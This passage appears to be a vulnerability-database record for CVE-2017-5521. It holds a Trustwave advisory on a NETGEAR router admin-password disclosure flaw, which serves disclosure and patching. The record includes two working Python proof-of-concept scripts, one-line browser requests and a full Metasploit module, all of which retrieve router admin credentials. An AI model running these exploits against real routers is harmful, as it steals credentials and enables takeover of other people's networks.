WNDR4500v2 V1.0.0.42_1.0.25\r\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\r\n# WGR614v10 V1.0.2.58_60.0.84NA\r\n# WGR614v10 V1.0.2.54_60.0.82NA\r\n# WN3100RP V1.0.0.14_1.0.19 (Latest)\r\n# WN3100RP V1.0.0.6_1.0.12\r\n\r\n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\r\n# Lenovo R3220 V1.0.0.13_1.0.13\r\n\r\n\r\nProduct description:\r\nMultiple Netgear Routers\r\n\r\nMany Netgear routers are prone to password disclosure via simple crafted \r\nrequests to the web management server. The bug is exploitable remotely if the \r\nremote management option is set and can also be exploited given access to the \r\nrouter over LAN or WLAN.\r\n\r\nWhen trying to access the web panel a user is asked to authenticate, if the \r\nauthentication is cancelled and password recovery is not enabled, the user is \r\nredirected to a page which exposes a password recovery token. If a user \r\nsupplies the correct token to the page \r\nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not \r\nenabled), they will receive the admin password for the router. \r\n\r\nIf password recovery is set the exploit will fail, as it will ask the user for the recovery \r\nquestions which were previously set when enabling the feature, this is \r\npersistent, even after disabling the recovery option the exploit will fail, \r\nbecause the router will ask for the security questions.\r\nThis can easily be reproduced using the attached poc, or by sending these two \r\nsimple requests via the browser:\r\n1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token\r\n2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)\r\n\r\n## netgore.py\r\nimport sys\r\nimport requests\r\n\r\n\r\ndef scrape(text, start_trig, end_trig):\r\n if text.find(start_trig) != -1:\r\n\treturn text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\r\n else:\r\n return \"i_dont_speak_english\"\r\n#disable nasty insecure ssl warning\r\nrequests.packages.urllib3.disable_warnings()\r\n#1st stage - get token\r\nip = sys.argv[1]\r\nport = sys.argv[2]\r\nurl = 'http://' + ip + ':' + port + '/'\r\ntry:\r\n\tr = requests.get(url)\r\nexcept:\r\n\turl = 'https://' + ip + ':' + port + '/'\r\n\tr = requests.get(url, verify=False)\r\nmodel = r.headers.get('WWW-Authenticate')\r\nif model is not None:\r\n\tprint \"Attcking: \" + model[13:-1]\r\nelse:\r\n\tprint \"not a netgear router\"\r\n\tsys.exit(0)\r\ntoken = scrape(r.text, 'unauth.cgi?id=', '\\\"')\r\nif token == 'i_dont_speak_english':\r\n\tprint \"not vulnerable\"\r\n\tsys.exit(0)\r\nprint \"token found: \" + token\r\n#2nd stage - pass the token - get the password\r\nurl = url + 'passwordrecovered.cgi?id=' + token\r\nr = requests.post(url, verify=False)\r\n#profit\r\nif r.text.find('left\\\">') != -1:\r\n\tusername = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))\r\n\tusername = scrape(username, '>', '\\'')\r\n\tpassword = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))\r\n\tpassword = scrape(password, '>', '\\'')\r\n\tif username == \"i_dont_speak_english\":\r\n\t\tusername = (scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>'))\r\n\t\tpassword = (scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>'))\r\nelse:\r\n\tprint \"not vulnerable becuse password recovery IS set\"\r\n\tsys.exit(0)\r\n#html encoding pops out of nowhere, lets replace that\r\npassword = password.replace(\"#\",\"#\")\r\npassword = password.replace(\"&\",\"&\")\r\nprint \"user: \" + username\r\nprint \"pass: \" + password\r\n\r\n================================\r\nJust run the PoC against a router to get the credentials if it is vulnerable.\r\n\r\n\r\n\r\nFinding 2: Remote and Local Password Disclosure\r\nCredit: Simon Kenin of Trustwave SpiderLabs\r\nCVE: CVE-2017-5521\r\n\r\nVersion affected: \r\n\r\n# AC1450 V1.0.0.34_10.0.16 (Latest)\r\n# AC1450 V1.0.0.22_1.0.10\r\n# AC1450 V1.0.0.14_1.0.6\r\n# D6300 V1.0.0.96_1.1.96 (Latest)\r\n# D6300B V1.0.0.36_1.0.36\r\n# D6300B V1.0.0.32_1.0.32\r\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)\r\n# D6400 V1.0.0.22_1.0.22\r\n# DC112A V1.0.0.30_1.0.60 (Latest)\r\n# DGN2200v4 V1.0.0.76_1.0.76 (Latest)\r\n# DGN2200v4 V1.0.0.66_1.0.66\r\n# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)\r\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\r\n# R6200 V1.0.1.56_1.0.43 (Latest)\r\n# R6200 V1.0.1.52_1.0.41\r\n# R6200 V1.0.1.48_1.0.37\r\n# R6200v2 V1.0.3.10_10.1.10 (Latest)\r\n# R6200v2 V1.0.1.20_1.0.18\r\n# R6250 V1.0.4.6_10.1.12 (Latest beta)\r\n# R6250 V1.0.4.2_10.1.10 (Latest stable)\r\n# R6250 V1.0.1.84_1.0.78 \r\n# R6300\tV1.0.2.78_1.0.58 (Latest)\r\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\r\n# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)\r\n# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)\r\n# R6700 V1.0.0.26_10.0.26 (Latest)\r\n# R6700 V1.0.0.24_10.0.18\r\n# R6900 V1.0.0.4_1.0.10 (Latest)\r\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\r\n# R7000 V1.0.4.30_1.1.67\r\n# R7900 V1.0.1.8_10.0.14 (Latest beta)\r\n# R7900 V1.0.1.4_10.0.12 (Latest stable)\r\n# R7900 V1.0.0.10_10.0.7\r\n# R7900 V1.0.0.8_10.0.5\r\n# R7900 V1.0.0.6_10.0.4\r\n# R8000 V1.0.3.26_1.1.18 (Latest beta)\r\n# R8000 V1.0.3.4_1.1.2 (Latest stable)\r\n# R8300 V1.0.2.48_1.0.52\r\n# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)\r\n# R8500 V1.0.2.30_1.0.43\r\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\r\n# VEGN2610 V1.0.0.27_1.0.27\r\n# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)\r\n# VEVG2660 V1.0.0.23_1.0.23\r\n# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)\r\n# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)\r\n# WNDR3400v3 V1.0.1.2_1.0.51\r\n# WNDR3400v3 V1.0.0.22_1.0.29\r\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\r\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\r\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\r\n# WNDR4500 V1.0.1.6_1.0.24 \r\n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\r\n# WNDR4500v2 V1.0.0.50_1.0.30\r\n# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)\r\n# WNR1000v3 V1.0.2.62_60.0.87 (Latest)\r\n# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)\r\n# WNR3500Lv2 V1.2.0.32_40.0.74\r\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\r\n# WGR614v10 V1.0.2.58_60.0.84NA\r\n# WGR614v10 V1.0.2.54_60.0.82NA\r\n\r\n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\r\n# Lenovo R3220 V1.0.0.13_1.0.13\r\n\r\n\r\nMany Netgear routers are prone to password disclosure via simple crafted \r\nrequest to the web management server. The bug is exploitable remotely if the \r\nremote management option is set and can also be exploited given access to the \r\nrouter over LAN or WLAN.\r\n\r\nNetgear routers have an option to restore forgotten password via 2 security \r\nquestions. If the recovery option is disabled (which is the default), it is \r\nstill possible to recover the password by sending a correct token to the \r\nrecovery page. \r\n\r\nIf a user supplies the correct token to the page \r\nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not \r\nenabled), they will receive the admin password for the router. If password \r\nrecovery is set the exploit will fail, as it will ask the user for the recovery \r\nquestions which were previously set when enabling the feature, this is \r\npersistent, even after disabling the recovery option, the exploit will fail, \r\nbecause the router will ask for the security questions.\r\n\r\nThis mechanism does not work correctly on the very first request to \r\n\"passwordrecovered.cgi\" and the token is not properly checked, this means that \r\nany TOKEN value will result in disclosure of the password.\r\nThe issue occurs after every reboot of the router.\r\n\r\nThis can easily be reproduced using the attached poc, or by sending a simple \r\nrequest via the browser:\r\n1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)\r\n\r\n## netgore2.py\r\nimport sys\r\nimport requests\r\n\r\ndef scrape(text, start_trig, end_trig):\r\n if text.find(start_trig) != -1:\r\n\treturn text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\r\n else:\r\n return \"i_dont_speak_english\"\r\n#disable nasty insecure ssl warning\r\nrequests.packages.urllib3.disable_warnings()\r\n#1st stage\r\nip = sys.argv[1]\r\nport = sys.argv[2]\r\nurl = 'http://' + ip + ':' + port + '/'\r\ntry:\r\n\tr = requests.get(url)\r\nexcept:\r\n\turl = 'https://' + ip + ':' + port + '/'\r\n\tr = requests.get(url, verify=False)\r\nmodel = r.headers.get('WWW-Authenticate')\r\nif model is not None:\r\n\tprint \"Attcking: \" + model[13:-1]\r\nelse:\r\n\tprint \"not a netgear router\"\r\n\tsys.exit(0)\r\n#2nd stage\r\nurl = url + 'passwordrecovered.cgi?id=get_rekt'\r\ntry:\r\n\tr = requests.post(url, verify=False)\r\nexcept:\r\n\tprint \"not vulnerable router\"\r\n\tsys.exit(0)\r\n#profit\r\nif r.text.find('left\\\">') != -1:\r\n\tusername = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))\r\n\tusername = scrape(username, '>', '\\'')\r\n\tpassword = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))\r\n\tpassword = scrape(password, '>', '\\'')\r\n\tif username == \"i_dont_speak_english\":\r\n\t\tusername = (scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>'))\r\n\t\tpassword = (scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>'))\r\nelse:\r\n\tprint \"not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again\"\r\n\tsys.exit(0)\r\n#html encoding pops out of nowhere, lets replace that\r\npassword = password.replace(\"#\",\"#\")\r\npassword = password.replace(\"&\",\"&\")\r\nprint \"user: \" + username\r\nprint \"pass: \" + password\r\n\r\n================================\r\nJust run the PoC against a router to get the credentials if it is vulnerable.\r\n\r\n\r\n\r\n\r\nRemediation Steps:\r\nPlease see NETGEAR's KBA for list of firmware patches for various models. As a \r\nworkaround, the bug only works when password recovery is NOT set. If you do set \r\npassword recovery this is not exploitable.\r\n\r\nRevision History:\r\n04/06/2016 - Vulnerability disclosed to vendor\r\n04/19/2016 - Request for update and received confirmation of receipt of the advisories\r\n05/18/2016 - Request for update; no response\r\n07/14/2016 - Request for update\r\n07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage\r\n10/17/2016 - Request for update\r\n12/15/2016 - Notice of intent to publish advisories\r\n01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd\r\n01/30/2017 - Advisory published\r\n\r\n\r\nReferences\r\n1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html\r\n2. https://www.exploit-db.com/exploits/32883/\r\n3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability\r\n\r\n\r\nAbout Trustwave:\r\nTrustwave is the leading provider of on-demand and subscription-based\r\ninformation security and payment card industry compliance management\r\nsolutions to businesses and government entities throughout the world. For\r\norganizations faced with today's challenging data security and compliance\r\nenvironment, Trustwave provides a unique approach with comprehensive\r\nsolutions that include its flagship TrustKeeper compliance management\r\nsoftware and other proprietary security solutions. Trustwave has helped\r\nthousands of organizations--ranging from Fortune 500 businesses and large\r\nfinancial institutions to small and medium-sized retailers--manage\r\ncompliance and secure their network infrastructure, data communications and\r\ncritical information assets. Trustwave is headquartered in Chicago with\r\noffices throughout North America, South America, Europe, Africa, China and\r\nAustralia. For more information, visit https://www.trustwave.com\r\n\r\nAbout Trustwave SpiderLabs:\r\nSpiderLabs(R) is the advanced security team at Trustwave focused on\r\napplication security, incident response, penetration testing, physical\r\nsecurity and security research. The team has performed over a thousand\r\nincident investigations, thousands of penetration tests and hundreds of\r\napplication security tests globally. In addition, the SpiderLabs Research\r\nteam provides intelligence through bleeding-edge research and proof of\r\nconcept tool development to enhance Trustwave's products and services.\r\nhttps://www.trustwave.com/spiderlabs\r\n\r\nDisclaimer:\r\nThe information provided in this advisory is provided \"as is\" without\r\nwarranty of any kind. Trustwave disclaims all warranties, either express or\r\nimplied, including the warranties of merchantability and fitness for a\r\nparticular purpose. In no event shall Trustwave or its suppliers be liable\r\nfor any damages whatsoever including direct, indirect, incidental,\r\nconsequential, loss of business profits or special damages, even if\r\nTrustwave or its suppliers have been advised of the possibility of such\r\ndamages. Some states do not allow the exclusion or limitation of liability\r\nfor consequential or incidental damages so the foregoing limitation may not\r\napply.", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/41205/"}], "metasploit": [{"lastseen": "2019-12-17T16:12:24", "description": "This module will collect the password for the `admin` user. The exploit will not complete if password recovery is set on the router. The password is received by passing the token generated from `unauth.cgi` to `passwordrecovered.cgi`. This exploit works on many different NETGEAR products. The full list of affected products is available in the 'References' section.\n", "published": "2017-02-05T18:39:58", "type": "metasploit", "title": "NETGEAR Administrator Password Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5521"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/GATHER/NETGEAR_PASSWORD_DISCLOSURE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NETGEAR Administrator Password Disclosure',\n 'Description' => %q{\n This module will collect the password for the `admin` user.\n The exploit will not complete if password recovery is set on the router.\n The password is received by passing the token generated from `unauth.cgi`\n to `passwordrecovered.cgi`. This exploit works on many different NETGEAR\n products. The full list of affected products is available in the 'References'\n section.\n\n },\n 'Author' =>\n [\n 'Simon Kenin', # Vuln Discovery, PoC\n 'thecarterb' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2017-5521' ],\n [ 'URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911' ],\n [ 'URL', 'http://thehackernews.com/2017/01/Netgear-router-password-hacking.html'],\n [ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/'],\n [ 'URL', 'http://pastebin.com/dB4bTgxz'],\n [ 'EDB', '41205']\n ],\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n OptString::new('TARGETURI', [true, 'The base path to the vulnerable application', '/'])\n ])\n end\n\n # @return substring of 'text', usually a response from a server in this case\n def scrape(text, start_trig, end_trig)\n text[/#{start_trig}(.*?)#{end_trig}/m, 1]\n end\n\n def run\n uri = target_uri.path\n uri = normalize_uri(uri)\n print_status(\"Checking if #{rhost} is a NETGEAR router\")\n vprint_status(\"Sending request to http://#{rhost}/\")\n\n # will always call check no matter what\n is_ng = check\n\n res = send_request_cgi({ 'uri' => uri })\n if res.nil?\n print_error(\"#{rhost} returned an empty response.\")\n return\n end\n\n if is_ng == Exploit::CheckCode::Detected\n marker_one = \"id=\"\n marker_two = \"\\\"\"\n token = scrape(res.to_s, marker_one, marker_two)\n if token.nil?\n print_error(\"#{rhost} is not vulnerable: Token not found\")\n return\n end\n\n if token == '0'\n print_status(\"If no creds are found, try the exploit again. #{rhost} returned a token of 0\")\n end\n print_status(\"Token found: #{token}\")\n vprint_status(\"Token found at #{rhost}/unauth.cgi?id=#{token}\")\n\n r = send_request_cgi({\n 'uri' => \"/passwordrecovered.cgi\",\n 'vars_get' => { 'id' => token }\n })\n\n vprint_status(\"Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}\")\n\n html = r.get_html_document\n raw_html = html.text\n\n username = scrape(raw_html, \"Router Admin Username\", \"Router Admin Password\")\n password = scrape(raw_html, \"Router Admin Password\", \"You can\")\n if username.nil? || password.nil?\n print_error(\"#{rhost} returned empty credentials\")\n return\n end\n username.strip!\n password.strip!\n\n if username.empty? || password.empty?\n print_error(\"No Creds found\")\n else\n print_good(\"Creds found: #{username}/#{password}\")\n end\n else\n print_error(\"#{rhost} is not vulnerable: Not a NETGEAR device\")\n end\n end\n\n # Almost every NETGEAR router sends a 'WWW-Authenticate' header in the response\n # This checks the response for that header.\n def check\n\n res = send_request_cgi({'uri'=>'/'})\n if res.nil?\n fail_with(Failure::Unreachable, 'Connection timed out.')\n end\n\n # Checks for the `WWW-Authenticate` header in the response\n if res.headers[\"WWW-Authenticate\"]\n data = res.to_s\n marker_one = \"Basic realm=\\\"\"\n marker_two = \"\\\"\"\n model = data[/#{marker_one}(.*?)#{marker_two}/m, 1]\n print_good(\"Router is a NETGEAR router (#{model})\")\n return Exploit::CheckCode::Detected\n else\n print_error('Router is not a NETGEAR router')\n return Exploit::CheckCode::Safe\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/netgear_password_disclosure.rb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}]}
